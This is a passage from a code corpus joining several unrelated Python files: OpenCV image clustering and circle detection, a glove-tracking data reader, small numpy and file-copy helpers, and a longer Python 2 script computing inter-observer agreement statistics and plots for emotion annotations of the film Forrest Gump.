image_file = 'a2_a_cropped.jpg'
print(image_file)
original_image = cv2.imread(image_file)
#img = cv2.cvtColor(original_image.astype('uint8'),cv2.COLOR_BGR2GRAY)
# convert our image from RGB Colours Space to HSV to work ahead.
img=cv2.cvtColor(original_image.astype('uint8'),cv2.COLOR_BGR2LAB)
l, a, b = cv2.split(img)
img = b; img=np.expand_dims(img,axis=2)
#cv2.imshow('image', img)
plt.figure(figsize=(10,10))
plt.imshow(img)
plt.show()
Z_tot = img.reshape((-1,img.shape[2])) #l.reshape(-1,1)
Z = np.float32(Z_tot)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 3
ret,label,center=cv2.kmeans(Z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
#center[2:K-1][:] = [255,255,255]
res = center[label.flatten()]
res2 = res.reshape((img.shape))
plt.figure(figsize=(10,10))
plt.imshow(res2)
plt.show()
circles = cv2.HoughCircles(res2.astype('uint8'), cv2.HOUGH_GRADIENT, 2.7, 85, param1=30,param2=90,minRadius=40,maxRadius=45)
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(res2,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(res2,(i[0],i[1]),2,(0,0,255),3)
plt.figure(figsize=(20,20))
plt.imshow(res2)
plt.xticks([]), plt.yticks([])
plt.show()
| StarcoderdataPython |
1759251 | <filename>dataAcquisition.py
from recoDataStructure import *
class DataReceiver:
"""This class helps us to read data into the program.
During the training stage, it can read data from file
and during recognition stage, it can get real time tracking data and
pass it to the Feature Extraction module."""
def __init__(self, l_or_r):
# 0 or 1, whether it's for the left or right hand
self._l_or_r = l_or_r
# data structure for real time training or recognition
self._gloveData = None
# data structure for training from file
self._gloveDataList = list()
def readDataFromFile(self, filePath):
"""Read a sample file and create a list of ARTGlove data samples"""
# read the file into a list
f = open(filePath, 'r')
lines = f.readlines()
f.close()
print(len(lines), "are read")
# create glove data and add it into the glove data list
indice = 0
limit = len(lines)
print(limit)
n = 0
while indice + 53 <= limit:
glove = self.createGloveFromFile(lines[indice:indice+53])
n += 1
self._gloveDataList.append(glove)
indice += 53
print(n,"samples are created.")
def createFingerFromFile(self, n, lines):
"""Function called by the createGloveFromFile function"""
pos_str = lines[0][0:-1].split(' ')
pos = list()
for p in pos_str:
pos.append(float(p))
ori_str = lines[1][0:-1] + ' ' + lines[2][0:-1] + ' ' + lines[3][0:-1]
ori_str = ori_str.split(' ')
ori = list()
for o in ori_str:
ori.append(float(o))
phalen_str = lines[5][0:-1].split(' ')
phalen = list()
for p in phalen_str:
phalen.append(float(p))
#print("lines[6]:",lines[6])
phaang_str = lines[6][0:-1].split(' ')
phaang = list()
for p in phaang_str:
phaang.append(float(p))
f = Finger(n, pos, ori, float(lines[4][0:-1]), phalen, phaang)
return f
def createGloveFromFile(self, lines):
"""Function called by the readDataFromFile function"""
pos_str = lines[5][0:-1].split(' ')
pos = list()
for p in pos_str:
pos.append(float(p))
ori_str = lines[6][0:-1] + ' ' + lines[7][0:-1] + ' ' + lines[8][0:-1]
ori_str = ori_str.split(' ')
ori = list()
for o in ori_str:
ori.append(float(o))
finger_name_list = ['pouce','index','majeur','annulaire','auriculaire']
i = 11
n = 0
fingers = list()
while n < 5:
fingers.append(self.createFingerFromFile(finger_name_list[n],lines[i+n*8:i+7+n*8]))
n += 1
lr = -1
if lines[3][0:-1] == 'left':
lr = 0
else:
lr = 1
g = Glove(lines[1][0:-1], 0, lines[2][0:-1], lr, int(lines[4][0:-1]), fingers, pos, ori)
return g
def readRealTimeData(self, g_frame):
""" Add a glove frame to pass later to the feature extractor """
for glove in g_frame._glove_list:
if glove._l_or_r == 1:
# use only right hand for now
self._gloveData = glove
def getOneSampleFrameFile(self):
"""Data from file, return the first data frame in the list"""
if len(self._gloveDataList) != 0:
return self._gloveDataList.pop(0)
else:
return None
def getOneSampleFrameRT(self):
return self._gloveData
def showGlovesFromFile(self):
for g in self._gloveDataList:
print(g._timestamp)
def getGloveNumberFromFile(self):
"""Return the number of samples that we create from file"""
return len(self._gloveDataList)
if __name__ == "__main__":
dr_left = DataReceiver(0)
dr_right = DataReceiver(1)
dr_left.readDataFromFile("data/final_dataset2.txt")
dr_right.readDataFromFile("data/final_dataset2.txt")
print("finish for left hand", dr_left.getGloveNumberFromFile())
print("finish for right hand", dr_right.getGloveNumberFromFile())
| StarcoderdataPython |
116102 | <reponame>gabrielsilvadev/URI-python-3<filename>1959.py<gh_stars>1-10
def entrada():
n,l = map(int,input().split())
return n,l
def perimetro(n,lado):
return n*lado
def main():
n,l=entrada()
print(perimetro(n,l))
main()
| StarcoderdataPython |
70161 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 24 14:46:59 2017
Some personal numpy array filtering and finding intersections with indices
@author: <NAME>
"""
import numpy as np
import glob
import os
import shutil
def idx_filter(idx, *array_list):
new_array_list = []
for array in array_list:
new_array_list.append(array[idx])
return new_array_list
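# Example (illustration only): keep the matching elements of several parallel arrays.
#   a = np.array([10, 20, 30]); b = np.array(['x', 'y', 'z'])
#   idx_filter(a > 15, a, b)  # -> [array([20, 30]), array(['y', 'z'], dtype='<U1')]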
def intersect(*arrays):
""" This only works if arrays are sorted and unique"""
matched = np.array(list(set(arrays[0]).intersection(*arrays[1:])))
return np.array([np.where(np.in1d(array, matched))[0] for array in arrays])
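# Example (illustration only): the input arrays must already be sorted and unique.
#   a = np.array([1, 3, 5, 7]); b = np.array([3, 4, 5, 6])
#   intersect(a, b)  # -> indices of the shared values {3, 5}: array([[1, 2], [0, 2]])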
def copy_dir_diff(dir1, dir2, dirout):
""" Copy files in dir1 that are missingin dir2 into dirout """
print(dir1)
fileList = glob.glob(os.path.join(dir1, '*'))
for curFullFile in fileList:
curFile = os.path.basename(curFullFile)
checkFullFile = os.path.join(dir2, curFile)
if os.path.isfile(checkFullFile):
print('{0} exist'.format(curFile))
else:
print('{0} miss'.format(curFile))
newFullFile = os.path.join(dirout, curFile)
shutil.copyfile(curFullFile, newFullFile)
| StarcoderdataPython |
95217 | #!/usr/bin/python
#
# This script generates summary statistics and raw plots for the data note
# associated with the annotations of portrayed emotions in the movie
# Forrest Gump. It is intended to serve as a more detailed description
# of the employed analysis and aggregation procedures than what is possible
# to convey in a manuscript.
#
# In order to reproduce the results, the script needs to be executed in the
# root of the extracted dataset. Summary statistics are printed with LaTeX
# markup and were directly included into the LaTeX sources of the associated
# Data note publication.
#
# Required arguments:
# 1. path to store the generated inter-observer agreement times series
# 2. path to store the generated figures
#
# The following python packages are required:
# - NumPy
# - SciPy
# - seaborn
#
# Example:
# $ python descr_stats.py /tmp /tmp
#
# This source code is (C) by <NAME> <<EMAIL>> and
# made available under the terms of the Creative Common Attribution-ShareAlike
# 4.0 International (CC BY-SA 4.0) license.
#
import numpy as np
from scipy.stats import spearmanr
# hard code the max duration of the movie stimulus
maxmovietime = 7085.28
#
# Helpers from PyMVPA
#
def plot_bars(data, labels=None, title=None, ylim=None, ylabel=None,
width=0.2, offset=0.2, color='0.6', distance=1.0,
yerr='ste', xloc=None, **kwargs):
"""Make bar plots with automatically computed error bars.
    Candlestick plots (multiple interleaved barplots) can be done
    by calling this function multiple times with an appropriately modified
    `offset` argument.
Parameters
----------
data : array (nbars x nobservations) or other sequence type
Source data for the barplot. Error measure is computed along the
second axis.
labels : list or None
If not None, a label from this list is placed on each bar.
title : str
An optional title of the barplot.
ylim : 2-tuple
Y-axis range.
ylabel : str
An optional label for the y-axis.
width : float
Width of a bar. The value should be in a reasonable relation to
`distance`.
offset : float
        Constant offset of all bars along the x-axis. Can be used to create
        candlestick plots.
color : matplotlib color spec
Color of the bars.
distance : float
Distance of two adjacent bars.
yerr : {'ste', 'std', None}
Type of error for the errorbars. If `None` no errorbars are plotted.
xloc : sequence
Locations of the bars on the x axis.
**kwargs
Any additional arguments are passed to matplotlib's `bar()` function.
"""
import pylab as pl
# determine location of bars
if xloc is None:
xloc = (np.arange(len(data)) * distance) + offset
if yerr == 'ste':
yerr = [np.std(d) / np.sqrt(len(d)) for d in data]
elif yerr == 'std':
yerr = [np.std(d) for d in data]
else:
# if something that we do not know just pass on
pass
# plot bars
plot = pl.bar(xloc,
[np.mean(d) for d in data],
yerr=yerr,
width=width,
color=color,
ecolor='black',
**kwargs)
if ylim:
pl.ylim(*(ylim))
if title:
pl.title(title)
if labels:
pl.xticks(xloc + width / 2, labels)
if ylabel:
pl.ylabel(ylabel)
# leave some space after last bar
pl.xlim(0, xloc[-1] + width + offset)
return plot
def unique_combinations(L, n, sort=False):
"""Return unique combinations form a list L of objects in groups of size n.
Parameters
----------
L : list
list of unique ids
n : int
length of the subsets to return
sort : bool, optional
if True -- result is sorted before returning
    If you intend to use only a small subset of the possible
    combinations, it is advised to use the generator
    `xunique_combinations`.
"""
res = list(xunique_combinations(L, n))
if sort:
res = sorted(res)
return res
def xunique_combinations(L, n):
"""Generator of unique combinations form a list L of objects in
groups of size n.
Parameters
----------
L : list
list of unique ids
n : int
grouping size
Adopted from <NAME>
http://code.activestate.com/recipes/190465/
(MIT license, according to activestate.com's policy)
Also good discussions on combinations/variations/permutations
with various implementations are available at
http://mail.python.org/pipermail/python-list/2004-October/286054.html
"""
if n == 0:
yield []
else:
for i in range(len(L) - n + 1):
for cc in xunique_combinations(L[i + 1:], n - 1):
yield [L[i]] + cc
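# Worked example (added comment): unique_combinations([1, 2, 3, 4], 2)
# returns [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]], i.e. all six
# order-independent pairs; xunique_combinations yields the same lists lazily.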
#
# Load data
#
def get_shots():
starts = np.loadtxt('movie_shots.csv')
segments = np.array((starts,
np.concatenate((starts[1:],
(maxmovietime,))))).T
return segments
def get_scenes():
starts = np.recfromcsv('movie_scenes.csv',
names=('start', 'title', 'tod', 'set'))['start']
segments = np.array((starts,
np.concatenate((starts[1:],
(maxmovietime,))))).T
return segments
def get_nsecond_segments(n=1):
    max_time = get_scenes()[-1, 1]
    return np.array((np.arange(0, max_time - n, n), np.arange(n, max_time, n))).T
def get_av_ratings():
import glob
return [np.recfromcsv(f) for f in glob.glob('raw/av*.csv')]
def get_ao_ratings():
import glob
return [np.recfromcsv(f) for f in glob.glob('raw/ao*.csv')]
def get_all_ratings():
return get_av_ratings() + get_ao_ratings()
#
# Stats
#
def get_labeled_fraction(rat, col):
# what fraction of the annotations carry values in a specific column
tot = np.sum([len(r) for r in rat])
lbl = np.sum([len(r) for r in get_labeled_ratings(rat, col)])
return float(lbl) / tot
def get_agreed_labels(ratings, col, segments, athresh=0.5, nseg_thresh=0):
# determine values for a particular column that show a minimum
# inter-observer agreement for a minimum number of time segments
# anywhere in the movie
from scipy.ndimage.measurements import label
labels = \
np.unique(
np.concatenate(
[np.unique(
np.concatenate(
[d.split() for d in r[col]]))
for r in ratings]))
found = []
for l in labels:
match = slice2segments(ratings, {col: l}, segments) > athresh
nseg = np.sum(match)
nblobs = label(match)[1]
if nblobs > nseg_thresh:
found.append((l, nseg, nblobs))
return found
def calc_bootstrapped_intercorrelation(ratings, cond1, cond2, segments):
    # split the set of observers into all possible ~halves and
    # compute the time series correlations of inter-observer
    # agreement wrt annotations matching particular criteria across
    # both groups
    # uses the module-level unique_combinations() copy defined above
    # (keeps the script free of a PyMVPA dependency, as stated in the header)
N = len(ratings)
corr = []
for combo in unique_combinations(range(N), N / 2):
half1 = [ratings[i] for i in combo]
half2 = [ratings[i] for i in xrange(N) if not i in combo]
c1 = slice2segments(half1, cond1, segments) \
- slice2segments(half1, cond2, segments)
c2 = slice2segments(half2, cond1, segments) \
- slice2segments(half2, cond2, segments)
corr.append(spearmanr(c1, c2)[0])
return corr
def get_ci_stats(arr):
# convert an array of correlation scores into a LaTeX
# markup with mean and CI
m = np.mean(arr)
sem = np.std(arr) / np.sqrt(len(arr))
if np.isnan(m):
return 'n/a'
else:
if m >= 0.5:
return '\\textbf{%.3f} $\\pm$%.3f' % (m, 1.96 * sem)
else:
return '%.3f $\\pm$%.3f' % (m, 1.96 * sem)
def get_corr_ci(v1, v2):
    # take two time series, compute the correlation, and yield a
    # LaTeX markup of the value plus a CI (via Fisher transform)
c = spearmanr(v1, v2)[0]
# fisher transform
fc = np.arctanh(c)
se = 1. / np.sqrt(len(v1) - 3)
# back to correlation
ci = np.tanh(fc + 1.96 * se)
if np.isnan(c):
return 'n/a'
else:
if c >= 0.5:
return '\\textbf{%.3f} $\\pm$%.3f' % (c, ci - c)
else:
return '%.3f $\\pm$%.3f' % (c, ci - c)
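# Worked numeric example (added comment, values are illustrative): for a
# correlation of c = 0.6 over len(v1) = 100 segments, the Fisher transform
# gives fc = arctanh(0.6) ~= 0.693 and se = 1/sqrt(97) ~= 0.102, so the upper
# bound is tanh(0.693 + 1.96 * 0.102) ~= 0.712 and the reported half-width is
# ~0.11; since c >= 0.5 the value would be typeset in bold.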
def print_stats(rat, rat_label, all_rat):
# compute various annotation statistics
print '\\newcommand{\\%sTotalRaters}{%i}' % (rat_label, len(rat))
athresh = 0.5
print '\\newcommand{\\%sAggThresh}{%i\\%%}' % (rat_label, athresh * 100)
segments = get_nsecond_segments()
print '\\newcommand{\\%sFracWithLabeledChar}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'character') * 100)
e = get_agreed_labels(rat, 'character', segments, athresh=-1)
print '%% %s total character labels' % (rat_label,)
print '%% %s' % [v[0] for v in e]
print '\\newcommand{\\%sTotalCharLabels}{%i}' % (rat_label, len(e))
e = get_agreed_labels(rat, 'character', segments, athresh=athresh, nseg_thresh=5)
print '%% %s character labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshCharLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledEmotions}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'emotion') * 100)
e = get_agreed_labels(rat, 'emotion', segments, athresh=athresh)
print '%% %s emotion labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshEmoLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledOncue}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'oncue') * 100)
e = get_agreed_labels(rat, 'oncue', segments, athresh=athresh)
print '%% %s oncue labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshOncueLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledOffcue}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'offcue') * 100)
e = get_agreed_labels(rat, 'offcue', segments, athresh=athresh)
print '%% %s offcue labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshOffcueLabels}{%i}' % (rat_label, len(e))
# per character stats
for char, clabel in (('*', 'AllChar'),
('FORREST', 'Forrest'),
('JENNY', 'Jenny')):
print '\\newcommand{\\%sCorrArousalValence%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_arousal_modulation(rat, segments, char=char),
get_valence_modulation(rat, segments, char=char)))
print '\\newcommand{\\%sCorrValenceDirection%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_valence_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)))
print '\\newcommand{\\%sCorrArousalDirection%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_arousal_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)))
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'arousal': 'HIGH', 'character': char},
{'arousal': 'LOW', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistArousal%s}{%s}' \
% (rat_label, clabel, s)
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'valence': 'POS', 'character': char},
{'valence': 'NEG', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistValence%s}{%s}' \
% (rat_label, clabel, s)
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'direction': 'SELF', 'character': char},
{'direction': 'OTHER', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistDirection%s}{%s}' \
% (rat_label, clabel, s)
for emo in get_unique_emotions(all_rat):
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'emotion': emo, 'character': char},
{'emotion': None, 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsist%s%s}{%s}' \
% (rat_label, emo, clabel, s)
for cue in get_unique_oncues(all_rat):
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'oncue': cue, 'character': char},
{'oncue': None, 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsist%s%s}{%s}' \
% (rat_label, cue, clabel, s)
#
# Plots
#
def comp_barplot(av, ao, col, ylabel):
# helper for all bar plots
import pylab as pl
    # uses the module-level plot_bars() helper defined above
    # (keeps the script free of a PyMVPA dependency, as stated in the header)
avd = {e[0]: e[col] for e in av}
aod = {e[0]: e[col] for e in ao}
joind = {k: 0 for k in avd.keys() + aod.keys()}
for k, v in avd.iteritems():
joind[k] = v
p = plot_bars([joind[k] for k in sorted(joind.keys())], yerr=None,
offset=-.15, width=.3)
p.set_label("audio-visual")
joind = {k: 0 for k in avd.keys() + aod.keys()}
for k, v in aod.iteritems():
joind[k] = v
p = plot_bars([joind[k] for k in sorted(joind.keys())], yerr=None,
color='0.2', offset=.15, width=.3,
labels=[bn(n) for n in sorted(joind.keys())])
p.set_label("audio-only")
pl.xlim((-1, len(joind)))
pl.ylabel(ylabel)
pl.legend()
def bipolar_tsplot(av, ao, col, colx_labels, ylabels, segments, char='*'):
# helper for all time series plot for bipolar variables
ts = slice2segments(ao, {col: colx_labels[0], 'character': char}, segments) \
- slice2segments(ao, {col: colx_labels[1], 'character': char}, segments)
pl.plot(segments.T[0], ts, label='audio-only', color='blue', alpha=.5)
pl.fill_between(segments.T[0], ts, color='blue', alpha=.5)
ts = slice2segments(av, {col: colx_labels[0], 'character': char}, segments) \
- slice2segments(av, {col: colx_labels[1], 'character': char}, segments)
pl.plot(segments.T[0], ts, label='audio-visual', color='green', alpha=.5)
pl.fill_between(segments.T[0], ts, color='green', alpha=.5)
pl.ylabel('%s' % (bn(col)))
pl.xlabel('movie time in seconds')
pl.xlim((segments[0, 0], segments[-1, 1]))
pl.yticks(np.array((-1, 0, 1)), ylabels)
pl.ylim((-1, 1))
pl.legend()
def unipolar_tsplot(av, ao, col, colx_label, segments, char='*'):
# helper for all time series plot for unipolar variables
pl.fill_between(
segments.T[0], slice2segments(ao, {col: colx_label, 'character': char}, segments),
label='audio-only', zorder=0, color='blue', alpha=.5)
pl.fill_between(
segments.T[0], slice2segments(av, {col: colx_label, 'character': char}, segments),
label='audio-visual', zorder=1, color='green', alpha=.5)
pl.ylabel('%s' % (bn(colx_label)))
pl.xlabel('movie time in seconds')
pl.xlim((segments[0, 0], segments[-1, 1]))
pl.ylim((0, 1))
pl.yticks(np.array((0, 1)), ('absent (0)', 'present (1)'))
def mkplot_indicator_ts(avr, aor, character, segments, figpath):
# demo plot with time series of various properties across the movie
fig = pl.figure(figsize=(10, 8), dpi=300)
_ = pl.subplot(811)
bipolar_tsplot(avr, aor,
'arousal', ('HIGH', 'LOW'),
('low (-1)', 'neutral (0)', 'high (+1)'),
segments,
char=character)
_ = pl.subplot(812)
bipolar_tsplot(avr, aor,
'valence', ('POS', 'NEG'),
('neg (-1)', 'neutral (0)', 'pos (+1)'),
segments,
char=character)
_ = pl.subplot(813)
unipolar_tsplot(avr, aor, 'emotion', 'HAPPINESS', segments, char=character)
_ = pl.subplot(814)
unipolar_tsplot(avr, aor, 'emotion', 'LOVE', segments, char=character)
_ = pl.subplot(815)
unipolar_tsplot(avr, aor, 'emotion', 'FEAR', segments, char=character)
_ = pl.subplot(816)
unipolar_tsplot(avr, aor, 'emotion', 'SADNESS', segments, char=character)
_ = pl.subplot(817)
unipolar_tsplot(avr, aor, 'emotion', 'ANGERRAGE', segments, char=character)
_ = pl.subplot(818)
unipolar_tsplot(avr, aor, 'oncue', 'VERBAL', segments, char=character)
fig.autofmt_xdate()
if character == '*':
character = 'allchar'
pl.savefig(opj(figpath, 'indicator_ts_%s.svg' % character.lower()))
def print_combstats(avr, aor):
# various stats computed across stimulus types
segments = get_nsecond_segments()
for char, clabel in (('*', 'AllChar'),
('FORREST', 'Forrest'),
('JENNY', 'Jenny')):
print '\\newcommand{\\InterModCorrArousal%s}{%s}' \
% (clabel,
get_corr_ci(get_arousal_modulation(avr, segments, char=char),
get_arousal_modulation(aor, segments, char=char)))
print '\\newcommand{\\InterModCorrValence%s}{%s}' \
% (clabel,
get_corr_ci(get_valence_modulation(avr, segments, char=char),
get_valence_modulation(aor, segments, char=char)))
print '\\newcommand{\\InterModCorrDirection%s}{%s}' \
% (clabel,
get_corr_ci(get_direction_modulation(avr, segments, char=char),
get_direction_modulation(aor, segments, char=char)))
for emo in get_unique_emotions(avr + aor):
print '\\newcommand{\\InterModCorr%s%s}{%s}' \
% (emo, clabel,
get_corr_ci(_get_modulation(avr, segments, emotion=emo, character=char),
_get_modulation(aor, segments, emotion=emo, character=char)))
for cue in get_unique_oncues(avr + aor):
print '\\newcommand{\\InterModCorr%s%s}{%s}' \
% (cue, clabel,
get_corr_ci(_get_modulation(avr, segments, oncue=cue, character=char),
_get_modulation(aor, segments, oncue=cue, character=char)))
#
# Segmentation
#
def mk_thresh_emotion_episodes(rat, thresh, segments):
    # yield a per-character list of emotion episodes with a minimum
    # inter-observer agreement wrt any emotion attribute
chars = get_unique_characters(rat)
episodes = {}
def _postprocess(e):
return {k: np.median(v) for k, v in e.iteritems()}
for char in chars:
ep = episodes.get(char, [])
ind = [get_arousal_modulation(rat, segments, char=char)]
labels = ['arousal']
for l, d in (('v_pos', dict(valence='POS')),
('v_neg', dict(valence='NEG')),
('d_self', dict(direction='SELF')),
('d_other', dict(direction='OTHER')),
('e_admiration', dict(emotion='ADMIRATION')),
('e_anger/rage', dict(emotion='ANGER/RAGE')),
('e_contempt', dict(emotion='CONTEMPT')),
('e_disappointment', dict(emotion='DISAPPOINTMENT')),
('e_fear', dict(emotion='FEAR')),
('e_fears_confirmed', dict(emotion='FEARS_CONFIRMED')),
('e_gloating', dict(emotion='GLOATING')),
('e_gratification', dict(emotion='GRATIFICATION')),
('e_gratitude', dict(emotion='GRATITUDE')),
('e_happiness', dict(emotion='HAPPINESS')),
('e_happy-for', dict(emotion='HAPPY-FOR')),
('e_hate', dict(emotion='HATE')),
('e_hope', dict(emotion='HOPE')),
('e_love', dict(emotion='LOVE')),
('e_pity/compassion', dict(emotion='PITY/COMPASSION')),
('e_pride', dict(emotion='PRIDE')),
('e_relief', dict(emotion='RELIEF')),
('e_remorse', dict(emotion='REMORSE')),
('e_resent', dict(emotion='RESENTMENT')),
('e_sadness', dict(emotion='SADNESS')),
('e_satisfaction', dict(emotion='SATISFACTION')),
('e_shame', dict(emotion='SHAME')),
('c_audio', dict(oncue='AUDIO')),
('c_context', dict(oncue='CONTEXT')),
('c_face', dict(oncue='FACE')),
('c_gesture', dict(oncue='GESTURE')),
('c_narrator', dict(oncue='NARRATOR')),
('c_verbal', dict(oncue='VERBAL')),
):
ind.append(_get_modulation(rat, segments, character=char, **d))
labels.append(l)
ind = np.array(ind)
# where is any above threshold agreement
flags = np.abs(ind) >= thresh
staging = None
last_ind = np.array([False] * len(ind))
# for each segment
for i, f in enumerate(flags.T):
# print i, f,
if not np.sum(f):
if staging:
ep.append(_postprocess(staging))
staging = None
# print 'commit',
last_ind = f
# print 'skip'
continue
# continuing episode?
if np.all(f == last_ind):
# end of annotation is end of current segment
staging['end'] = segments[i, 1]
for nl, l in enumerate(labels):
staging[l].append(ind[nl, i])
# print 'extend'
else:
# new episode
if staging:
# print 'commit',
ep.append(_postprocess(staging))
# print 'new'
staging = dict(start=segments[i, 0],
end=segments[i, 1])
last_ind = f
for nl, l in enumerate(labels):
staging[l] = [ind[nl, i]]
episodes[char] = ep
return episodes, labels
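# Note on the return value (added comment): `episodes` maps each character to
# a list of dicts, one per contiguous above-threshold stretch, holding 'start'
# and 'end' in movie seconds plus the median inter-observer agreement for each
# indicator in `labels` (arousal, v_pos, v_neg, the e_* emotions and the c_*
# onset cues); `labels` lists those indicator names in order.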
def emo2advene(data, labels, thresh=0.5):
# format output of `mk_thresh_emotion_episodes()` into a format that is
# importable by Advene, while merging all episodes of all characters
# into a single file
episodes = []
s = ''
for char, ep in data.iteritems():
for e in ep:
e['character'] = char
episodes.append(e)
episodes = sorted(episodes, cmp=lambda x, y: cmp(x['start'], y['start']))
for e in episodes:
tags = []
if e['arousal'] > thresh:
tags.append('ha')
elif e['arousal'] < (-1 * thresh):
tags.append('la')
for l in labels:
if l == 'arousal':
continue
if e[l] > thresh:
tags.append(l[2:])
e['tags'] = ','.join(tags)
s += "%(start).1f\t%(end).1f\tchar=%(character)s tags=%(tags)s arousal=%(arousal).2f val_pos=%(v_pos).2f val_neg=%(v_neg).2f\n" % e
return s
#
# Helpers
#
def bn(n):
# beautify names
n = n.lower()
if n == 'forrestvo':
return 'Forrest (VO)'
elif n == 'mrsgump':
return 'Mrs. Gump'
elif n == 'disappointment':
return 'Disappoint.'
elif n == 'angerrage':
return 'Anger/Rage'
return n.capitalize()
def get_unique_characters(rat):
return np.unique(
np.concatenate(
[np.unique([a['character'] for a in an])
for an in rat]))
def get_unique_emotions(rat):
return [e for e in np.unique(
np.concatenate(
[np.unique(
np.concatenate([a['emotion'].split() for a in an]))
for an in rat])) if not '?' in e]
def get_unique_oncues(rat):
return [e for e in np.unique(
np.concatenate(
[np.unique(
np.concatenate([a['oncue'].split() for a in an]))
for an in rat])) if not '?' in e]
def slice2segments(ratings, cond, segments):
    # compute a time series of inter-observer agreement wrt a particular
    # emotion property (or combinations thereof)
    # annotations, given with start and stop times, are converted into a
    # time series with data point locations given by the sequence of
    # `segments`. Segments intersecting with a given annotation from an
    # individual observer are set to one, the rest to zero. The mean
    # across observers for any segment is returned.
slicer = np.zeros(len(segments))
for rat in ratings:
rslicer = np.zeros(len(segments))
for e in rat:
use = True
for k, v in cond.iteritems():
if v == '*':
continue
if k in ('oncue', 'offcue', 'emotion'):
if not v in e[k].split():
use = False
else:
if not v == e[k]:
use = False
if not use:
continue
select = np.logical_and(segments.T[1] > e['start'],
segments.T[0] < e['end'])
rslicer[select] += 1
slicer += rslicer > 0
slicer = slicer.astype(float) / len(ratings)
return slicer
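# Worked example (added comment, toy numbers): with two observers, segments
# [[0, 1], [1, 2], [2, 3]], and matching annotations spanning 0.5-1.5 s for
# one observer and 1.2-2.8 s for the other, the returned agreement series is
# [0.5, 1.0, 0.5] -- each value is the fraction of observers whose annotation
# overlaps that segment.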
def get_labeled_ratings(rat, col):
return [r[r[col] != ''] for r in rat]
def get_timeseries(rat, urat, segments, char='*'):
# yield time series representations of all relevant emotion attributes
# from raw annotations
vars = [get_arousal_modulation(rat, segments, char=char),
get_valence_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)]
labels = ['arousal', 'valence', 'direction']
for emo in get_unique_emotions(urat):
vars.append(_get_modulation(rat, segments, emotion=emo, character=char))
labels.append(emo.lower())
for oc in get_unique_oncues(urat):
vars.append(_get_modulation(rat, segments, oncue=oc, character=char))
labels.append(oc.lower())
return np.array(vars).T, labels
def _get_modulation(ratings, segments, **kwargs):
return slice2segments(ratings, kwargs, segments)
def get_arousal_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, arousal='HIGH') \
- _get_modulation(ratings, segments, character=char, arousal='LOW')
return ts
def get_valence_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, valence='POS') \
- _get_modulation(ratings, segments, character=char, valence='NEG')
return ts
def get_direction_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, direction='SELF') \
- _get_modulation(ratings, segments, character=char, direction='OTHER')
return ts
if __name__ == '__main__':
# main function: compute stats, generate derived data, make figures
import sys
import pylab as pl
import os
from os.path import join as opj
if len(sys.argv) < 3:
print "insufficient number of arguments"
print "usage: descr_stats.py <stats export path> <figure export path>"
sys.exit(1)
statspath = sys.argv[1]
figpath = sys.argv[2]
for p in (opj(statspath, 'timeseries'),
opj(statspath, 'segmentation')):
if not os.path.exists(p):
os.makedirs(p)
second_segments = get_nsecond_segments()
avr = get_av_ratings()
aor = get_ao_ratings()
open(opj(statspath, 'segmentation', 'emotions_av_1s_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(avr, .5, get_nsecond_segments(1)),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_ao_1s_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(aor, .5, get_nsecond_segments(1)),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_av_shots_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(avr, .5, get_shots()),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_ao_shots_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(aor, .5, get_shots()),
thresh=.5))
# export inter-observer agreement timeseries
# for stim type
for rat, ratlabel in ((avr, 'av'), (aor, 'ao')):
# for segment type
for seg, seglabel in ((get_nsecond_segments(1), '1s'),
(get_nsecond_segments(2), '2s'),
(get_shots(), 'shots')):
# for all characters
for char in ('*',) + tuple(get_unique_characters(rat)):
arr, l = get_timeseries(rat, rat, seg, char=char)
if char == '*':
char = 'allchar'
np.savetxt(
